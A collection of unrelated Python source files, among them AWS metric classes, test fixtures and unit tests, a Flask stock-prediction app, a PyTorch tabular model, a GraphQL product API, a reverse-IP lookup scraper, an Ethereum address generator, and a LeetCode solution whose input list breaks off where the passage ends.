    def _compute_value(self):
        jobs = sagemaker_client.list_training_jobs(
            StatusEquals="Completed",
        )["TrainingJobSummaries"]
        return len(jobs)


class CompletedTrainingJobs24h(Metric):
    """Count of SageMaker training jobs completed in the last 24 hours."""

    _iam_permissions = Metric._iam_permissions + [
        {"Action": ["sagemaker:ListTrainingJobs"], "Resource": "*"}
    ]

    def _compute_value(self):
        today = datetime.datetime.now()
        yesterday = today - datetime.timedelta(days=1)
        jobs = sagemaker_client.list_training_jobs(
            StatusEquals="Completed",
            LastModifiedTimeAfter=yesterday,
            LastModifiedTimeBefore=today,
        )["TrainingJobSummaries"]
        return len(jobs)


class NumberEndPointsInService(Metric):
    """Count of SageMaker endpoints currently in service."""

    _iam_permissions = Metric._iam_permissions + [
        {"Action": "sagemaker:ListEndpoints", "Resource": "*"}
    ]

    def _compute_value(self):
        eps = sagemaker_client.list_endpoints(
            StatusEquals="InService",
        )["Endpoints"]
        return len(eps)


class SSMParamStoreValueMyName(Metric):
    """Current value of the ``MyName`` SSM parameter."""

    _iam_permissions = Metric._iam_permissions + [
        {
            "Action": "ssm:GetParameter",
            "Resource": "arn:aws:ssm:*:**ACCOUNT_ID**:parameter/MyName",
        }
    ]

    def _compute_value(self):
        return ssm_client.get_parameter(Name="MyName")["Parameter"]["Value"]
python
from datetime import datetime

import pytest


@pytest.fixture(scope="module")
def lab():
    """Payload for a uniquely named test lab (name carries a unix timestamp)."""
    stamp = str(int(datetime.timestamp(datetime.now())))
    return {"name": f"test-lab-{stamp}", "description": "Test Lab", "path": "/"}


@pytest.fixture(scope="module")
def setup_lab(lab, authenticated_client):
    """Create the module's lab, yield it, and delete it on teardown."""
    created = authenticated_client.api.create_lab(**lab)
    yield created
    authenticated_client.api.delete_lab(lab["path"] + lab["name"])


@pytest.fixture()
def lab_path(lab):
    """Full path (parent path + name) of the module's lab."""
    return lab["path"] + lab["name"]
python
#encoding: UTF-8 import urllib2 import re import socket import time rfile = open('./ip.txt') wfile = open('./result.csv', 'a+') for line in rfile: opener = urllib2.build_opener() time.sleep(0.5) opener.addheaders = [('User-Agent', 'Mozilla/6.0 (Linux 5.5; rv:6.0.2) Gecko/20140101 Firefox/6.0.0')] req = opener.open('http://reverseip.domaintools.com/search/?q='+line.strip()) socket.setdefaulttimeout(8) responseHtml = req.read() match = re.findall(r'<span title=(.+)</span></td>', responseHtml) wfile.write(socket.gethostbyname(line.strip())+','+'\n') print line.strip() for val in match: wfile.write(val+','+'\n') wfile.write('\n') rfile.close() wfile.close()
python
from .sqlalchemy import SQLAlchemy
from .db import base  # kept for the (currently disabled) base registration below

# Shared module-level database handle: import this instead of instantiating
# SQLAlchemy() elsewhere so the whole application uses one instance.
db = SQLAlchemy()
# db.register_base(base)
python
import mock
import testtools

from shakenfist.baseobject import DatabaseBackedObject, State
from shakenfist import exceptions
from shakenfist.tests import base


class DatabaseBackedObjectTestCase(base.ShakenFistTestCase):
    """Tests for DatabaseBackedObject's state and error attribute handling.

    NOTE: each mocked ``side_effect`` list is consumed strictly in call order,
    so the assertions inside each test must stay in exactly this sequence.
    """

    @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_get_attribute',
                side_effect=[
                    {'value': None, 'update_time': 2},
                    {'value': DatabaseBackedObject.STATE_INITIAL, 'update_time': 4},
                    {'value': DatabaseBackedObject.STATE_CREATED, 'update_time': 10},
                ])
    def test_state(self, mock_get_attribute):
        # Each read of d.state consumes the next canned attribute dict above.
        d = DatabaseBackedObject('uuid')
        self.assertEqual(d.state, State(None, 2))
        self.assertEqual(d.state, State(DatabaseBackedObject.STATE_INITIAL, 4))
        self.assertEqual(d.state, State(
            DatabaseBackedObject.STATE_CREATED, 10))

    def test_property_state_object_full(self):
        # State is a simple value object: check accessors, dict form,
        # equality and repr round-trip.
        s = State('state1', 3)

        self.assertEqual(s.value, 'state1')
        self.assertEqual(s.update_time, 3)
        self.assertEqual(s.obj_dict(), {
            'value': 'state1',
            'update_time': 3,
        })
        self.assertEqual(s, State('state1', 3))
        self.assertEqual(str(s), "State({'value': 'state1', 'update_time': 3})")

    @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_set_attribute')
    @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_get_attribute',
                side_effect=[
                    None,
                    {'message': 'bad error'},
                    {'value': DatabaseBackedObject.STATE_INITIAL, 'update_time': 4},
                    {'value': DatabaseBackedObject.STATE_ERROR, 'update_time': 4},
                    {'message': 'real bad'},
                ])
    def test_property_error_msg(self, mock_get_attribute, mock_set_attribute):
        d = DatabaseBackedObject('uuid')
        # No stored attribute yet -> error reads as None.
        self.assertEqual(d.error, None)
        self.assertEqual(d.error, 'bad error')

        # Setting an error while not in the ERROR state must raise...
        with testtools.ExpectedException(exceptions.InvalidStateException):
            d.error = 'real bad'

        # ...but succeeds once the mocked state reads as STATE_ERROR.
        d.error = 'real bad'
python
from .base import *  # NOTE(review): presumably provides BaseDataset and os — confirm
import scipy.io
from os import path as pth


class Food(BaseDataset):
    # Food-101-style dataset: images live in <root>/images/<category>/*.jpg and
    # <root>/categories.txt lists one category name per line; the class index
    # of a category is its position in that file. Only samples whose class is
    # in ``classes`` are kept.
    def __init__(self, root, classes, transform = None):
        BaseDataset.__init__(self, root, classes, transform)

        img_dir = pth.join(root,"images")
        category_path = pth.join(root,"categories.txt")
        with open(category_path,"r") as f:
            categories = f.read().split()
        # category name -> integer class id, in file order
        cat2class = {cat:i for i,cat in enumerate(categories)}
        # .replace("._","") strips macOS resource-fork prefixes from filenames
        img_paths = [os.path.join(dp, f).replace("._","") for dp, dn, filenames in os.walk(img_dir) for f in filenames if os.path.splitext(f)[1] == '.jpg']
        # class id per image, derived from the parent directory name
        # (assumes '/' separators — TODO confirm on Windows)
        ys = [cat2class[img_path.split("/")[-2]] for img_path in img_paths]
        index = 0
        for im_path, y in zip(img_paths, ys):
            if y in classes: # choose only specified classes
                self.im_paths.append(os.path.join(root, im_path))
                self.ys.append(y)
                # NOTE(review): index only advances for *kept* samples here, so
                # self.I is simply 0..len-1 — confirm this matches the other
                # datasets derived from BaseDataset.
                self.I += [index]
                index += 1
python
"""Get debug information."""
from googledevices.helpers import gdh_session


def debug(host, loop, test, timeout):
    """Run the requested debug check against the Google device at ``host``.

    ``loop`` is the asyncio event loop used to drive the coroutine; ``timeout``
    is forwarded to the connectivity probe. Only the "connectivity" test is
    implemented — any other value of ``test`` is silently a no-op.
    """
    from googledevices.utils.debug import Debug

    async def connectivity():
        """Test connectivity a Google Home unit."""
        async with gdh_session():
            googledevices = Debug(host)
            await googledevices.connectivity(timeout)

    if test == "connectivity":
        loop.run_until_complete(connectivity())
python
"""Flask app: predicts a future stock price, persists predictions to Postgres,
and exposes HTML, JSON and database-read endpoints."""
from database.connect import DatabaseError
from flask import Flask, request, render_template, jsonify
import json
import sys

from database import Database
from src.predict import *  # NOTE(review): presumably provides predict_future_price and np — confirm

app = Flask(__name__)


def pipeline(ticker, years):
    """Coerce raw user input to the (str ticker, int years) pair the model expects."""
    ticker = str(ticker)
    years = int(years)
    return ticker, years


def error_check():
    """Translate the exception currently being handled into a JSON response.

    Must be called from inside an ``except`` block. Fix: the previous version
    tested the truthiness of a *tuple of exception classes* — always true —
    so every failure was reported as 400 "Check input". We now inspect the
    active exception via sys.exc_info().
    """
    exc = sys.exc_info()[1]
    if isinstance(exc, (KeyError, json.JSONDecodeError, AssertionError, ValueError)):
        return json.dumps({"error": "Check input"}), 400
    return json.dumps({"error": "Prediction Failed"}), 500


def clean_final_price(prediction: float) -> float:
    """Convert the model output to a rounded float.

    NOTE(review): the join/float dance assumes ``prediction`` is a 1-element
    array-like; more than one element would make float() raise — confirm the
    predictor's return shape.
    """
    price = np.round(prediction, decimals=2)
    string_price = " ".join(map(str, price))
    final_price = float(string_price)
    return final_price


def get_database_data(query, args=(), one=False):
    """Run ``query`` against the Postgres database and return rows as dicts.

    With ``one=True`` returns the first row (or None); otherwise a list.
    """
    cursor = Database().connect()
    cursor.execute(query, args)
    r = [dict((cursor.description[i][0], value)
              for i, value in enumerate(row)) for row in cursor.fetchall()]
    cursor.close()
    return (r[0] if r else None) if one else r


def insert_data(ticker: str, years: int, final_price: float):
    """Insert one prediction row into the Data table.

    Raises DatabaseError if the insert fails. NOTE(review): no explicit
    commit is visible — presumably Database() autocommits; confirm.
    """
    try:
        cursor = Database().connect()
        cursor.execute("INSERT INTO Data (ticker_name, years_analysed, Future_price)\
             VALUES (%s, %s, %s)", (ticker, years, final_price))
        cursor.close()
    except DatabaseError:
        raise DatabaseError("Unable to add data")


@app.route("/")
def home():
    """Renders initial template for the app."""
    return render_template("index.html")


@app.route('/predict', methods=["POST"])
def predict_output() -> str:
    """Form endpoint: render the predicted price and model confidence."""
    try:
        ticker = request.form.get('Stock Ticker Name')
        years = request.form.get('Number of years', type=int)
        val = predict_future_price(ticker, years)
        prediction = val[0]
        lr_confidence = round(val[1] * 100, 2)
        final_price = clean_final_price(prediction)
        insert_data(ticker, years, final_price)
        return render_template("index.html",
                               prediction_text="{} price tomorrow will be ${:.2f} with a \
            confidence of {}%".format(ticker, final_price, lr_confidence))
    except Exception:  # narrowed from a bare except; error_check maps the cause
        return error_check()


@app.route('/results', methods=["POST"])
def results_json():
    """JSON endpoint: [ticker, years] in, predicted price out."""
    data = request.get_json()
    # NOTE(review): assumes the client posts a 2-element array — confirm.
    ticker = data[0]
    years = data[1]
    ticker, years = pipeline(ticker, years)
    pred = predict_future_price(ticker, years)
    predicted_price = pred[0]
    final_price = clean_final_price(predicted_price)
    return json.dumps({"Predicted future Price in Dollars": final_price})


@app.route('/read_database', methods=["GET"])
def output():
    """Return the first 10 rows of the Data table as JSON."""
    my_query = get_database_data("SELECT * FROM Data LIMIT %s", (10,))
    json_output = json.dumps(my_query, default=str)
    return json_output


if __name__ == "__main__":
    app.run(debug=True)
python
"""Tabular playground training: embedding+MLP model over label-encoded
categoricals and continuous features, 10-fold training with TensorBoard logs."""
import pandas as pd
import numpy as np
import config
import utils
import torch
import torch.nn as nn
import torch.nn.functional as F

from pathlib import Path
from tqdm.auto import tqdm
from sklearn.metrics import roc_auc_score
from datetime import datetime
from torch.utils.data import DataLoader, Dataset
from torch.utils.tensorboard import SummaryWriter


class PlaygroundData(Dataset):
    """Dataset of label-encoded categoricals (``*le`` columns) and continuous
    features (``cont*`` columns); tensors are placed on GPU when available."""

    def __init__(
        self,
        data=None,
        path=None,
    ):
        """Build from an in-memory DataFrame (``data``) or a CSV (``path``)."""
        if data is not None:
            self.data = data
        else:
            self.data = pd.read_csv(path)
        self.catcol_names = [col for col in self.data.columns if col.endswith("le")]
        self.contcol_names = [
            col for col in self.data.columns if col.startswith("cont")
        ]
        self.features = self.catcol_names + self.contcol_names
        self.device = (
            torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
        )
        self.catcols = torch.tensor(
            self.data[self.catcol_names].values, device=self.device, dtype=torch.long
        )
        self.contcols = torch.tensor(
            self.data[self.contcol_names].values,
            device=self.device,
            dtype=torch.float32,
        )
        self.target = torch.tensor(
            self.data.target.values, device=self.device, dtype=torch.long
        )

    def __len__(self):
        return len(self.data)

    def __getitem__(self, idx):
        x_cat = self.catcols[idx, :]
        x_cont = self.contcols[idx, :]
        y = self.target[idx]
        return x_cat, x_cont, y

    @classmethod
    def from_df(cls, df):
        """Alternate constructor from an in-memory DataFrame."""
        return cls(data=df)

    @staticmethod
    def embed_dim(n):
        """
        Calculates the embedding dimension given the number of categories:
        half the cardinality, capped at 50.
        """
        return int(min(np.ceil(n / 2), 50))

    def embedding_sizes(self):
        """Return (num_embeddings, embedding_dim) per categorical column.

        ``+1`` because codes are assumed to run from 0 to max inclusive.
        """
        sizes = []
        for col in self.catcol_names:
            nunique = self.data[col].max()
            emb_dim = self.embed_dim(nunique)
            sizes.append((nunique + 1, emb_dim))
        return sizes


class PlaygroundModel(nn.Module):
    """Embeddings + MLP over the continuous block, fused into a 2-class head."""

    def __init__(self, embedding_sizes, n_cont):
        super(PlaygroundModel, self).__init__()
        self.embeddings = nn.ModuleList(
            [
                nn.Embedding(num_embedding, embedding_dim)
                for num_embedding, embedding_dim in embedding_sizes
            ]
        )
        self.n_emb = sum(emb.embedding_dim for emb in self.embeddings)
        # NOTE(review): emb_fc is never used in forward() (emb1 is used
        # instead); kept so existing checkpoints still load.
        self.emb_fc = nn.Linear(self.n_emb, self.n_emb)
        self.n_cont = n_cont
        cont_fc_dim = 512

        self.emb1 = nn.Linear(self.n_emb, self.n_emb)
        self.cont1 = nn.Linear(n_cont, cont_fc_dim)
        self.cont2 = nn.Linear(cont_fc_dim, cont_fc_dim)
        self.cont3 = nn.Linear(cont_fc_dim, cont_fc_dim)
        self.cont4 = nn.Linear(cont_fc_dim, cont_fc_dim)

        self.fc1 = nn.Linear(self.n_emb + cont_fc_dim, 128)
        self.fc2 = nn.Linear(128, 128)
        self.fc3 = nn.Linear(128, 2)

        self.emb_bn = nn.BatchNorm1d(self.n_emb)
        self.bn1 = nn.BatchNorm1d(self.n_cont)
        self.bn2 = nn.BatchNorm1d(cont_fc_dim)
        self.bn3 = nn.BatchNorm1d(128)

        self.emb_drops = nn.Dropout(0.3)
        self.drops = nn.Dropout(0.3)

    def forward(self, x_cat, x_cont):
        # Embed each categorical column and concatenate along features.
        x = [emb(x_cat[:, i]) for i, emb, in enumerate(self.embeddings)]
        x = torch.cat(x, dim=1)
        x = self.emb_drops(x)
        x = self.emb1(x)
        x = F.relu(x)
        x = self.emb_bn(x)

        # Continuous branch: 4 FC layers with interleaved batch norm.
        x_cont = self.bn1(x_cont)
        x_cont = self.cont1(x_cont)
        x_cont = F.relu(x_cont)
        x_cont = self.cont2(x_cont)
        x_cont = F.relu(x_cont)
        x_cont = self.bn2(x_cont)
        x_cont = self.cont3(x_cont)
        x_cont = F.relu(x_cont)
        x_cont = self.cont4(x_cont)
        x_cont = F.relu(x_cont)

        # Fuse branches and classify (2 logits).
        x = torch.cat([x, x_cont], 1)
        x = F.relu(x)
        x = self.fc1(x)
        x = F.relu(x)
        x = self.fc2(x)
        x = F.relu(x)
        x = self.bn3(x)
        x = self.fc3(x)
        return x

    def predict_proba(self, x_cat, x_cont):
        """Softmax class probabilities for the given batch."""
        x = self.forward(x_cat, x_cont)
        return nn.Softmax(-1)(x)


def fold_split(df, fold):
    """Split ``df`` into train/valid datasets on its ``kfold`` column."""
    train = PlaygroundData.from_df(df.loc[df.kfold != fold])
    valid = PlaygroundData.from_df(df.loc[df.kfold == fold])
    return train, valid


def train_loop(train_dl, model, optimizer, criterion, epoch, writer=None):
    """One training epoch; logs the running mean loss per epoch."""
    model.train()
    training_loss = utils.AverageMeter(name="loss")
    with tqdm(train_dl, unit="batch") as tepoch:
        for batch in tepoch:
            optimizer.zero_grad()
            tepoch.set_description(f"Epoch {epoch}.")
            x_cat, x_cont, y = batch
            outputs = model(x_cat, x_cont)
            loss = criterion(outputs, y)
            loss.backward()
            optimizer.step()
            training_loss.update(loss.item(), n=x_cat.shape[0])
            tepoch.set_postfix(Loss=training_loss.avg)
        if writer is not None:
            # Fix: pass the epoch as global_step; without it every epoch's
            # point landed on the same TensorBoard step.
            writer.add_scalar("Loss/train", training_loss.avg, epoch)


def eval_loop(valid_dl, model, writer=None, epoch=None):
    """Evaluate AUC over the validation loader; returns the AverageMeter."""
    model.eval()
    valid_auc = utils.AverageMeter(name="AUC")
    with torch.no_grad():
        with tqdm(valid_dl, unit="batch") as vepoch:
            for batch in vepoch:
                vepoch.set_description(f"Validation")
                x_cat, x_cont, y = batch
                batch_proba = (
                    model.predict_proba(x_cat, x_cont).detach().cpu().numpy()[:, 1]
                )
                auc_score = roc_auc_score(y.cpu().numpy(), batch_proba)
                valid_auc.update(auc_score, n=x_cat.shape[0])
                vepoch.set_postfix(AUC=valid_auc.avg)
            if writer is not None:
                writer.add_scalar("AUC", valid_auc.avg, epoch)
    return valid_auc


def now():
    """Timestamp string used to group runs in logs/checkpoints."""
    return datetime.now().strftime("%Y-%m-%d_%H:%M")


def run(fold, epochs=10, bs=512, lr=1e-3, lr_decay=0.99, start_time=0):
    """Train one fold end-to-end, logging to TensorBoard and saving the model."""
    df = pd.read_csv(config.TRAIN_DATA)
    device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")

    train, valid = fold_split(df, fold)
    train_dl = DataLoader(train, batch_size=bs, shuffle=True)
    valid_dl = DataLoader(valid, batch_size=4096, shuffle=False)

    model = PlaygroundModel(train.embedding_sizes(), 11)
    model = model.to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=lr)
    criterion = nn.CrossEntropyLoss()
    # Fix: exponential decay lr * lr_decay**epoch. The previous lambda
    # (lr_decay * epoch) multiplied the base LR by 0 at epoch 0 and then
    # *grew* it on later epochs.
    scheduler = torch.optim.lr_scheduler.LambdaLR(
        optimizer, lambda epoch: lr_decay ** epoch
    )

    # Logging setup
    params = f"bs={bs}_lr={lr}_lr-decay={lr_decay}__{start_time}"
    writer = SummaryWriter(log_dir=config.LOG_DIR / params / f"Fold={fold}")

    for epoch in range(epochs):
        train_loop(train_dl, model, optimizer, criterion, epoch, writer=writer)
        auc = eval_loop(valid_dl, model, writer=writer, epoch=epoch)
        scheduler.step()

    model_export_path = config.MODEL_DIR / params
    model_export_path.mkdir(parents=True, exist_ok=True)
    torch.save(model, model_export_path / f"Fold={fold}_AUC={auc.avg}.pth")


if __name__ == "__main__":
    start_time = now()
    for fold in range(10):
        run(fold, start_time=start_time)
python
import graphene
from graphene import Argument
from graphene_django.types import DjangoObjectType

from ..models import Category, Product


class ProductType(DjangoObjectType):
    """GraphQL object type mapped onto the Product model."""

    class Meta:
        model = Product


def _resolve_categories(category_ids):
    """Fetch Category rows for the given ids.

    Raises Category.DoesNotExist if any id is unknown (same behavior as
    the previous per-id .get() loops in Create/Update).
    """
    return [Category.objects.get(pk=pk) for pk in category_ids]


class Query(object):
    all_products = graphene.List(ProductType)
    product = graphene.Field(ProductType, id=graphene.ID())

    def resolve_all_products(self, info, **kwargs):
        # Querying a list of products
        return Product.objects.all()

    def resolve_product(self, info, id):
        # Querying a single product
        return Product.objects.get(pk=id)


class CreateProduct(graphene.Mutation):
    """Create a Product, optionally attaching existing categories."""

    class Arguments:
        name = graphene.String()
        price = graphene.Float()
        category = graphene.List(graphene.ID)
        in_stock = graphene.Boolean()
        date_created = graphene.types.datetime.DateTime()

    product = graphene.Field(ProductType)

    def mutate(self, info, name, price=None, category=None, in_stock=True,
               date_created=None):
        product = Product.objects.create(
            name=name,
            price=price,
            in_stock=in_stock,
            date_created=date_created,
        )
        if category is not None:
            product.category.set(_resolve_categories(category))
            product.save()
        return CreateProduct(product=product)


class UpdateProduct(graphene.Mutation):
    """Partially update a Product; only the supplied fields change."""

    class Arguments:
        id = graphene.ID()
        name = graphene.String()
        price = graphene.Float()
        category = graphene.List(graphene.ID)
        in_stock = graphene.Boolean()
        date_created = graphene.types.datetime.DateTime()

    product = graphene.Field(ProductType)

    def mutate(self, info, id, name=None, price=None, category=None,
               in_stock=None, date_created=None):
        product = Product.objects.get(pk=id)
        # Keep the existing value for any argument the caller omitted.
        product.name = name if name is not None else product.name
        product.price = price if price is not None else product.price
        product.in_stock = in_stock if in_stock is not None else product.in_stock
        product.date_created = (
            date_created if date_created is not None else product.date_created
        )
        if category is not None:
            product.category.set(_resolve_categories(category))
        product.save()
        return UpdateProduct(product=product)


class DeleteProduct(graphene.Mutation):
    """Delete a Product by primary key; returns the deleted instance."""

    class Arguments:
        id = graphene.ID()

    product = graphene.Field(ProductType)

    def mutate(self, info, id):
        # .get() raises Product.DoesNotExist for an unknown id, so the old
        # `if product is not None` guard was dead code — removed.
        product = Product.objects.get(pk=id)
        product.delete()
        return DeleteProduct(product=product)


class Mutation(graphene.ObjectType):
    create_product = CreateProduct.Field()
    update_product = UpdateProduct.Field()
    delete_product = DeleteProduct.Field()
python
import os PROJECT_NAME = "fastapi sqlalchemy pytest example" VERSION = "0.0.1" BASE_DIR: str = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) API_PREFIX = "/api" SQLALCHEMY_DATABASE_URL: str = os.getenv('DATABASE_URI', f"sqlite:///{BASE_DIR}/foo.db") DEBUG=True
python
""" MIT License Copyright (c) 2018 Simon Olofsson Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import numpy as np def laplace_approximation (model, Xdata): # Dimensions E = model.num_outputs D = model.dim_p meas_noise_var = model.meas_noise_var if isinstance(meas_noise_var, (int, float)): meas_noise_var = np.array([meas_noise_var] * E) # Invert measurement noise covariance if meas_noise_var.ndim == 1: imeasvar = np.diag(1./meas_noise_var) else: imeasvar = np.linalg.inv(meas_noise_var) # Inverse covariance matrix iA = np.zeros( (D, D) ) for e1 in range(E): dmu1 = model.d_mu_d_p(e1, Xdata) assert dmu1.shape == (len(Xdata),D) iA += imeasvar[e1,e1] * np.matmul(dmu1.T, dmu1) if meas_noise_var.ndim == 1: continue for e2 in range(e1+1,E): if imeasvar[e1,e2] == 0.: continue dmu2 = model.d_mu_d_p(e2, Xdata) assert dmu2.shape == (len(Xdata),D) iA += imeasvar[e1,e2] * np.matmul(dmu1.T, dmu2) iA += imeasvar[e2,e1] * np.matmul(dmu2.T, dmu1) Sigma = np.linalg.inv(iA) return Sigma
python
from secrets import token_bytes from coincurve import PublicKey from sha3 import keccak_256 import os private_key = keccak_256(token_bytes(32)).digest() public_key = PublicKey.from_valid_secret(private_key).format(compressed=False)[1:] addr = keccak_256(public_key).digest()[-20:] def clear(): if os.name == 'nt': os.system("cls") else: os.system("clear") def generate(p,a): print('ERC20 ADDRESS: 0x' + a.hex().upper()) print('PRIVATE KEY:', p.hex()) pass def ui(): #clear() choices = { '1' : '1', '2' : '2' } print("1. Generate an address for me\n2. Generate 'n' addresses for me (BROKEN)") ad = 'invalid' id = ad while id == ad: id = input('\nSelect an option from above : ') id = choices.get(id,'invalid') if id == '1': generate(private_key,addr) exit() elif id == '2': n = input("Enter number of addresses to generate - ") n = int(n) ini = 1 while(ini <= n): print(f'\n{ini}') generate(private_key,addr) print('\n') ini++1 if __name__ == "__main__": ui()
python
#!/usr/bin/env python """ Stackfuck Interpreter """ try: from setuptools import setup except ImportError: from distutils.core import setup with open("README.md") as file_readme: readme = file_readme.read() setup( name="Stackfuck", version="0.0.1", description="Interpreter for esoteric language Stackfuck", long_description=readme, author="fxcqz", license="MIT", url="https://github.com/fxcqz/stackfuck", packages=["stackfuck", "stackfuck.tests"], test_suite="stackfuck.tests", )
python
import collections from typing import List class Solution: def longestSubsequence(self, arr: List[int], difference: int) -> int: longest = 0 while arr: new_arr = [] curr = [arr[0]] for j in arr[1:]: if j == curr[-1] + difference: curr.append(j) else: new_arr.append(j) longest = max(longest, len(curr)) arr = new_arr return longest s = Solution() print(s.longestSubsequence( [-4709, 1448, -1257, 4598, 2311, 6228, 3829, -4684, -8278, -7636, 7913, -7342, 1670, 2116, 3460, -8560, -4155, 3070, -9452, -7215, 4565, 7825, 4601, -1013, 3732, -7471, 7583, -483, -3412, -188, -4655, -3070, -388, -7627, -9766, 3435, 2020, 1197, 7488, -8933, 2644, -7940, -8402, 8958, 6650, -3969, -7151, -5517, 3830, -8448, 4446, 9795, 7488, -9350, -6877, -2486, 6214, 6571, -277, 1115, -6043, -3621, -9113, 6354, -9422, 2419, 1637, -575, 1460, -8081, -5410, -3892, 5413, -1023, 608, 4458, 5174, -490, -3303, -4492, 9000, -8352, -8461, 488, 3191, -1528, 5744, 3310, 5587, -9893, -7351, 513, -6660, -469, 2829, 841, -3223, -7590, 1544, -1795, -6459, 6659, 3279, 4445, 9445, 3403, -3403, 2889, -7284, 6069, 3024, -6947, 7917, -3405, 5677, 9607, 1869, -2986, -3407, 9536, -5075, 580, -1208, -248, 980, 3446, -2320, 6963, -8211, 3708, -893, 9593, -4945, 8972, -9142, -6414, -6773, -4083, -3792, 8349, -7084, -9620, -2721, -1257, -6448, -9753, 4889, 3733, 3368, 3527, 9779, 8761, -5170, 9375, 7239, -1010, 4157, -1155, 5556, 992, -5933, 7261, -7059, -6312, 2830, -5440, 129, 2901, 9500, -4129, -7206, 3708, 2940, 5277, 7773, -9664, 5727, 7776, -9528, -3930, -7685, -1243, -7587, 3638, 9107, -8318, -8078, -5356, 5966, 9246, 7703, -9911, 1621, 121, 2409, 5622, 8582, 6139, -1476, -2701, 2907, 1779, 2702, -170, -3909, 2036, -7867, -2955, 9180, 3116, 4323, 2781, 9846, -6182, -3332, 4726, 8310, -9307, 2641, -2339, 705, -9747, -1631, 7808, 7917, -8777, -531, 5146, -7711, -5208, 3474, 2491, -6882, -4108, 9526, -3541, 4025, -1819, -1076, -72, -8129, -4862, -8355, 6062, -7891, -5696, 8372, 7898, 6162, -8518, -8833, 1739, -7341, 
7530, 3074, 942, 6720, -6625, -9643, -6649, 259, 9817, 2433, 5870, 8184, 4353, -2014, 7997, 7739, -5667, -8209, -7162, 245, 5188, -8214, -2355, -7020, -8891, -5942, -5327, 4809, -306, 6819, -9023, -5268, 9635, 3614, -1443, -8312, 7840, -9199, -4160, -7231, 10000, -4129, -3659, -9998, 6559, 6409, 8763, -6636, 2771, -488, 6804, 5620, 3664, 8026, 2376, -3457, 8554, -89, -5125, -9724, -3366, -2702, -6066, 8296, 7410, 6824, 4988, 9071, 6914, 9276, 6043, 2662, 7115, -4578, -8617, -7335, -964, -7557, 9924, 488, -8370, 3897, -38, 4336, 6112, -3455, 5428, 7243, 2333, -8722, 5104, 413, 7555, 4749, -8682, -6122, -656, 9799, 8416, 451, 8667, 9519, 9217, 9817, -2593, 1300, 6786, 6907, 3494, -542, 9995, -8002, 4034, -2933, 8060, -7683, 4554, -9981, -9417, -9423, 2638, 2921, -7685, 1108, -5852, -1783, -4529, -2147, 7936, -9052, 3322, 8007, -1030, 4437, 8965, -9005, -8383, -9961, 6518, 1647, -2948, -6817, 6393, -1632, -9250, 4736, -7501, 8300, -4926, 2619, -5473, -8944, -8821, 304, -4149, -3717, -5004, 5236, 5331, 8158, -1757, -9958, 7922, -2741, 4430, -5353, -5451, 3250, -8880, 8006, 9616, 4494, -9642, -1394, -6912, -6869, -9656, 8026, -9579, -9877, 7094, -4203, -2398, -8318, 5133, 6332, 1384, 494, 5527, 8787, -6738, 6688, 2507, -7504, -1109, 9776, 2807, -1831, 4933, 657, -4074, -1011, -4495, 520, -6128, -5797, 1837, 5828, -1960, -8015, 7320, 5355, 2650, 726, 1965, -9164, -8873, 3261, -7807, -9111, -2413, -2115, 6335, -1093, 8633, 3629, 8277, 4634, -8993, -5630, -9605, 7405, 1782, 6622, -7604, -5880, -917, -4820, -3689, -4483, -284, 4958, 3882, 7889, 2905, 9626, -5559, 3435, 8242, -5286, -516, -3719, -1154, 1668, 9176, 5154, -6463, -3364, -979, 7309, 3322, 5021, 9550, -8908, 5085, 8331, 7952, 6074, -2253, 4396, -5380, -9189, 3223, -4308, 1212, 3032, 6347, -6317, 2861, -4154, 9149, -2758, -9855, -8963, 1890, -9606, -1216, 8010, 637, 4365, -9354, 5176, 8474, 1659, 768, -5205, -770, 9589, -7571, 5125, 5837, -9558, -4537, 6896, -7652, -2943, 1316, 4582, -198, 9142, 6411, -41, 8773, 
5411, -1285, -1824, -9744, 4404, 2719, -8671, -3681, 9716, -5632, 4429, -4761, 2358, 3520, -6327, 1633, 8015, -1815, 6403, -3818, 3746, -6403, -1294, 4912, 6685, 3684, -1035, -7266, 1987, 6955, 3018, 7430, 8932, 9808, 3514, -9019, 5290, -5177, -6093, 290, -9207, 3142, 4522, -9122, -2146, -8903, -1348, 4125, -9822, -4029, 4013, 2378, -8450, 3157, -9729, 1347, 2085, -4061, 3203, 6418, -5592, -1225, -9488, 3559, -2217, 3015, 8960, 2835, 6413, -7880, -8973, -1225, -1171, 9117, -5936, 4005, -4974, -776, 3043, 9985, 5995, 6581, -429, -8248, 1293, 9981, 5487, 8339, -3930, -5052, -376, 9108, 6872, -4535, 1747, -9142, -6569, 9267, -9290, 3851, 5485, 8509, -5944, -8435, 1394, -8924, 5500, -3134, 9397, -3570, -7074, 3827, 8912, 8134, 5038, -3879, -5094, 3, -7461, -4811, -9405, 7899, 788, 3814, -8040, 8530, -2633, 43, 6070, -6987, 2199, -2448, 676, -3468, -2566, -7342, 6049, -3039, -1556, -8875, -9553, 9159, 7792, 1288, 7967, -200, 6841, -2402, -7982, 2614, 5536, 4100, -7524, 4240, 998, 859, -8681, -5001, -5542, -309, -1653, 2684, 1328, 6442, -9246, 8977, 7292, -4323, -9843, -8219, -2550, 4736, -6849, 9061, -6359, -665, 2210, -263, 660, -170, 6045, 2038, -549, -129, 6783, 5636, 9825, 8931, 6366, 7108, 640, -5980, -1275, -2785, 4697, 7641, -9532, -2010, 6593, 9389, 728, -7097, -4283, -3760, -6218, 2184, 3213, 31, 4997, -3436, -4727, 